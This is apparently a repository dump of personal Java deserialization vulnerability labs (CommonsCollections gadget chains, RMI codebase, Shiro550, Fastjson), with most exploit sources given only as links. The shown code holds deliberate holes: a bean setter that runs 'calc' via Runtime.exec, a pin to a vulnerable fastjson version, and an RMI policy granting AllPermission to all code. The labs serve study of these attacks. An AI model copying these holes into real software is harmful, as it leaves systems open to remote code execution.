├── CommonsCollections1
├── .idea
│ ├── .gitignore
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections1.iml
├── out
│ └── production
│ │ └── CommonsCollections1
│ │ ├── LazyMapExploit.class
│ │ └── TransformedMapExploit.class
└── src
│ ├── LazyMapExploit.java
│ └── TransformedMapExploit.java
├── CommonsCollections11
├── .idea
│ ├── .gitignore
│ ├── compiler.xml
│ ├── jarRepositories.xml
│ ├── misc.xml
│ └── vcs.xml
├── CommonsCollections11.iml
├── pom.xml
├── src
│ └── main
│ │ └── java
│ │ ├── CommonsCollections11.java
│ │ └── cc11.java
└── target
│ └── classes
│ ├── CommonsCollections11.class
│ └── cc11.class
├── CommonsCollections2
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ ├── commons_collections4_4_0.xml
│ │ └── javassist_3_25_0_GA.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections2.iml
├── out
│ └── production
│ │ └── CommonsCollections2
│ │ ├── CommonsCollections2.class
│ │ └── CommonsCollections2Method2.class
└── src
│ ├── CommonsCollections2.java
│ └── CommonsCollections2Method2.java
├── CommonsCollections3
├── .idea
│ ├── .gitignore
│ ├── compiler.xml
│ ├── libraries
│ │ ├── commons_collections_3_1.xml
│ │ └── javassist_3_25_0_GA.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── uiDesigner.xml
│ └── vcs.xml
├── CommonsCollections3.iml
├── out
│ └── production
│ │ └── CommonsCollections3
│ │ ├── CommonsCollections3.class
│ │ ├── CommonsCollections3Method2.class
│ │ ├── CommonsCollectionsShiro.class
│ │ └── client.class
└── src
│ ├── CommonsCollections3.java
│ └── CommonsCollections3Method2.java
├── CommonsCollections4
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ ├── commons_collections4_4_0.xml
│ │ └── javassist_3_25_0_GA.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections4.iml
├── out
│ └── production
│ │ └── CommonsCollections4
│ │ ├── CommonsCollections4.class
│ │ └── CommonsCollections4Method2.class
└── src
│ ├── CommonsCollections4.java
│ └── CommonsCollections4Method2.java
├── CommonsCollections5
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ └── commons_collections_3_1.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections5.iml
└── src
│ └── CommonsCollections5.java
├── CommonsCollections6
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ └── commons_collections_3_1.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections6.iml
├── out
│ └── production
│ │ └── CommonsCollections6
│ │ ├── CommonsCollections6.class
│ │ └── CommonsCollections6Method2.class
└── src
│ ├── CommonsCollections6.java
│ └── CommonsCollections6Method2.java
├── CommonsCollections7
├── .idea
│ ├── .gitignore
│ ├── libraries
│ │ └── commons_collections_3_1.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── CommonsCollections7.iml
├── out
│ └── production
│ │ └── CommonsCollections7
│ │ └── CommonsCollections7.class
└── src
│ └── CommonsCollections7.java
├── FastJasonPOC
├── .idea
│ ├── .gitignore
│ ├── .name
│ ├── compiler.xml
│ ├── jarRepositories.xml
│ ├── misc.xml
│ ├── uiDesigner.xml
│ └── vcs.xml
├── FastJasonPOC.iml
├── pom.xml
├── src
│ └── main
│ │ └── java
│ │ ├── EvilClass.java
│ │ └── User.java
└── target
│ └── classes
│ ├── EvilClass.class
│ └── User.class
├── README.md
├── RMI_Codebase
├── .idea
│ ├── .gitignore
│ ├── encodings.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── RMI_Codebase.iml
├── out
│ └── production
│ │ └── RMI_Codebase
│ │ ├── Calc.class
│ │ ├── ICalc.class
│ │ ├── RMIClient$Payload.class
│ │ ├── RMIClient.class
│ │ ├── RemoteRMIServer.class
│ │ └── client.policy
└── src
│ ├── Calc.java
│ ├── ICalc.java
│ ├── RMIClient.java
│ ├── RemoteRMIServer.java
│ └── client.policy
├── URLDNS
├── .idea
│ ├── .gitignore
│ ├── misc.xml
│ ├── modules.xml
│ └── vcs.xml
├── URLDNS.iml
├── out.bin
├── out
│ └── production
│ │ └── URLDNS
│ │ └── URLDNS.class
└── src
│ └── URLDNS.java
└── shiro550
├── .idea
├── .gitignore
├── misc.xml
├── modules.xml
└── vcs.xml
├── out
└── production
│ └── shiro550
│ └── shiro550.class
├── shiro550.iml
└── src
└── shiro550.java
/CommonsCollections1/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections1\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections1/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections1/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections1/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections1/CommonsCollections1.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections1/out/production/CommonsCollections1/LazyMapExploit.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/out/production/CommonsCollections1/LazyMapExploit.class
--------------------------------------------------------------------------------
/CommonsCollections1/out/production/CommonsCollections1/TransformedMapExploit.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/out/production/CommonsCollections1/TransformedMapExploit.class
--------------------------------------------------------------------------------
/CommonsCollections1/src/LazyMapExploit.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/src/LazyMapExploit.java
--------------------------------------------------------------------------------
/CommonsCollections1/src/TransformedMapExploit.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections1/src/TransformedMapExploit.java
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections11\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/compiler.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections11/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections11/CommonsCollections11.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections11/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | CommonsCollections11
9 | 1.0-SNAPSHOT
10 |
11 |
12 | commons-collections
13 | commons-collections
14 | 3.1
15 |
16 |
17 | org.javassist
18 | javassist
19 | 3.19.0-GA
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/CommonsCollections11/src/main/java/CommonsCollections11.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/src/main/java/CommonsCollections11.java
--------------------------------------------------------------------------------
/CommonsCollections11/src/main/java/cc11.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/src/main/java/cc11.java
--------------------------------------------------------------------------------
/CommonsCollections11/target/classes/CommonsCollections11.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/target/classes/CommonsCollections11.class
--------------------------------------------------------------------------------
/CommonsCollections11/target/classes/cc11.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections11/target/classes/cc11.class
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections2\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/libraries/commons_collections4_4_0.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/libraries/javassist_3_25_0_GA.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections2/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections2/CommonsCollections2.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2.class
--------------------------------------------------------------------------------
/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/out/production/CommonsCollections2/CommonsCollections2Method2.class
--------------------------------------------------------------------------------
/CommonsCollections2/src/CommonsCollections2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/src/CommonsCollections2.java
--------------------------------------------------------------------------------
/CommonsCollections2/src/CommonsCollections2Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections2/src/CommonsCollections2Method2.java
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections3\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/compiler.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/libraries/javassist_3_25_0_GA.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/CommonsCollections3.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3.class
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/CommonsCollections3Method2.class
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/CommonsCollectionsShiro.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/CommonsCollectionsShiro.class
--------------------------------------------------------------------------------
/CommonsCollections3/out/production/CommonsCollections3/client.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/out/production/CommonsCollections3/client.class
--------------------------------------------------------------------------------
/CommonsCollections3/src/CommonsCollections3.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/src/CommonsCollections3.java
--------------------------------------------------------------------------------
/CommonsCollections3/src/CommonsCollections3Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections3/src/CommonsCollections3Method2.java
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections4\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/libraries/commons_collections4_4_0.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/libraries/javassist_3_25_0_GA.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections4/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections4/CommonsCollections4.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4.class
--------------------------------------------------------------------------------
/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/out/production/CommonsCollections4/CommonsCollections4Method2.class
--------------------------------------------------------------------------------
/CommonsCollections4/src/CommonsCollections4.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/src/CommonsCollections4.java
--------------------------------------------------------------------------------
/CommonsCollections4/src/CommonsCollections4Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections4/src/CommonsCollections4Method2.java
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections5\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections5/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections5/CommonsCollections5.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections5/src/CommonsCollections5.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections5/src/CommonsCollections5.java
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections6\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections6/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections6/CommonsCollections6.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6.class
--------------------------------------------------------------------------------
/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6Method2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/out/production/CommonsCollections6/CommonsCollections6Method2.class
--------------------------------------------------------------------------------
/CommonsCollections6/src/CommonsCollections6.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/src/CommonsCollections6.java
--------------------------------------------------------------------------------
/CommonsCollections6/src/CommonsCollections6Method2.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections6/src/CommonsCollections6Method2.java
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\CommonsCollections7\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/libraries/commons_collections_3_1.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections7/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections7/CommonsCollections7.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/CommonsCollections7/out/production/CommonsCollections7/CommonsCollections7.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections7/out/production/CommonsCollections7/CommonsCollections7.class
--------------------------------------------------------------------------------
/CommonsCollections7/src/CommonsCollections7.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/CommonsCollections7/src/CommonsCollections7.java
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\FastJasonTempl\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/.name:
--------------------------------------------------------------------------------
1 | FastJasonPOC
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/compiler.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FastJasonPOC/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FastJasonPOC/FastJasonPOC.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/FastJasonPOC/pom.xml:
--------------------------------------------------------------------------------
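<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>FastJasonTempl</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <!-- Pinned to an old fastjson release on purpose: this module is a
             deserialization lab, not a dependency baseline to copy. -->
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.44</version>
        </dependency>
        <dependency>
            <groupId>org.javassist</groupId>
            <artifactId>javassist</artifactId>
            <version>3.19.0-GA</version>
        </dependency>
    </dependencies>

</project>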
--------------------------------------------------------------------------------
/FastJasonPOC/src/main/java/EvilClass.java:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/FastJasonPOC/src/main/java/EvilClass.java
--------------------------------------------------------------------------------
/FastJasonPOC/src/main/java/User.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 |
/**
 * Instrumented lab bean.
 *
 * <p>The constructor, the getter and the setter each print a trace line, so a
 * run shows which members are invoked while an instance is being populated
 * (presumably by the Fastjson parser this project depends on; the caller is
 * not part of this file).
 *
 * <p>{@link #setName(String)} also starts {@code calc} as a visible marker.
 * The defensive lesson: whatever a setter does runs as soon as a binder
 * populates the object, so setters on types reachable from untrusted input
 * must stay free of side effects, and the input must never be allowed to pick
 * the target type (keep Fastjson autoType disabled).
 */
public class User {
    // Package-private, as in the original listing.
    String name;

    /** Prints a trace line so that object construction is visible in the output. */
    public User() {
        System.out.println("constructor invoked");
    }

    /**
     * Prints a trace line and returns the stored name.
     *
     * @return the current name, or {@code null} if none was set
     */
    public String getName() {
        System.out.println("get name");
        return this.name;
    }

    /**
     * Prints a trace line, starts {@code calc}, then stores the name.
     *
     * @param name value to store
     * @throws IOException if the process cannot be started; the field is then
     *                     left unchanged because the assignment comes last
     */
    public void setName(String name) throws IOException {
        System.out.println("set name");
        // Deliberate side effect: the marker that shows the setter really ran.
        Runtime.getRuntime().exec("calc");
        this.name = name;
    }

    /** Renders the bean as {@code User{name='...'}}. */
    @Override
    public String toString() {
        return String.format("User{name='%s'}", name);
    }
}
28 |
--------------------------------------------------------------------------------
/FastJasonPOC/target/classes/EvilClass.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/FastJasonPOC/target/classes/EvilClass.class
--------------------------------------------------------------------------------
/FastJasonPOC/target/classes/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/FastJasonPOC/target/classes/User.class
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Java-deserialization-vulnerability
2 |
3 | Personal notes for Java Deserialization Vulnerability.
4 |
5 | 对应[Java反序列化漏洞利用链集合详解](https://leihehehe.github.io/2021/07/31/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%B9%8B%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90%E9%9B%86%E5%90%88-4/)
6 |
7 | 不定时更新、总结。
8 |
9 | 目前包含:
10 |
11 | - URLDNS
12 | - CommonsCollections 1
13 | - CommonsCollections 2
14 | - CommonsCollections 3
15 | - CommonsCollections 4
16 | - CommonsCollections 5
17 | - CommonsCollections 6
18 | - CommonsCollections 7
19 | - CommonsCollections 11
20 | - RMI Codebase远程命令攻击
21 | - Shiro550反序列化漏洞
22 | - Fastjson各版本反序列化漏洞系列
23 |
--------------------------------------------------------------------------------
/RMI_Codebase/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../../:\gitRepo\webSecurity\deserilize\RMI_Codebase\.idea/dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/RMI_Codebase/.idea/encodings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RMI_Codebase/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RMI_Codebase/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RMI_Codebase/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RMI_Codebase/RMI_Codebase.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/RMI_Codebase/out/production/RMI_Codebase/Calc.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/RMI_Codebase/out/production/RMI_Codebase/Calc.class
--------------------------------------------------------------------------------
/RMI_Codebase/out/production/RMI_Codebase/ICalc.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/RMI_Codebase/out/production/RMI_Codebase/ICalc.class
--------------------------------------------------------------------------------
/RMI_Codebase/out/production/RMI_Codebase/RMIClient$Payload.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/RMI_Codebase/out/production/RMI_Codebase/RMIClient$Payload.class
--------------------------------------------------------------------------------
/RMI_Codebase/out/production/RMI_Codebase/RMIClient.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/RMI_Codebase/out/production/RMI_Codebase/RMIClient.class
--------------------------------------------------------------------------------
/RMI_Codebase/out/production/RMI_Codebase/RemoteRMIServer.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leihehehe/Java-deserialization-vulnerability/40875e4c0b32404d5f10d21d5a9ffbfac1acad4d/RMI_Codebase/out/production/RMI_Codebase/RemoteRMIServer.class
--------------------------------------------------------------------------------
/RMI_Codebase/out/production/RMI_Codebase/client.policy:
--------------------------------------------------------------------------------
// Unscoped grant (no codeBase, no signedBy): every permission goes to all code.
// A SecurityManager running under this policy restricts nothing. Lab use only.
// NOTE(review): presumably a build copy of src/client.policy - confirm.
1 | grant {
2 | permission java.security.AllPermission;
3 | };
--------------------------------------------------------------------------------
/RMI_Codebase/src/Calc.java:
--------------------------------------------------------------------------------
1 | import java.rmi.Remote;
2 | import java.rmi.RemoteException;
3 | import java.util.List;
4 | import java.rmi.server.UnicastRemoteObject;
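/**
 * Server-side implementation of {@link ICalc}, exported through
 * {@link UnicastRemoteObject}.
 *
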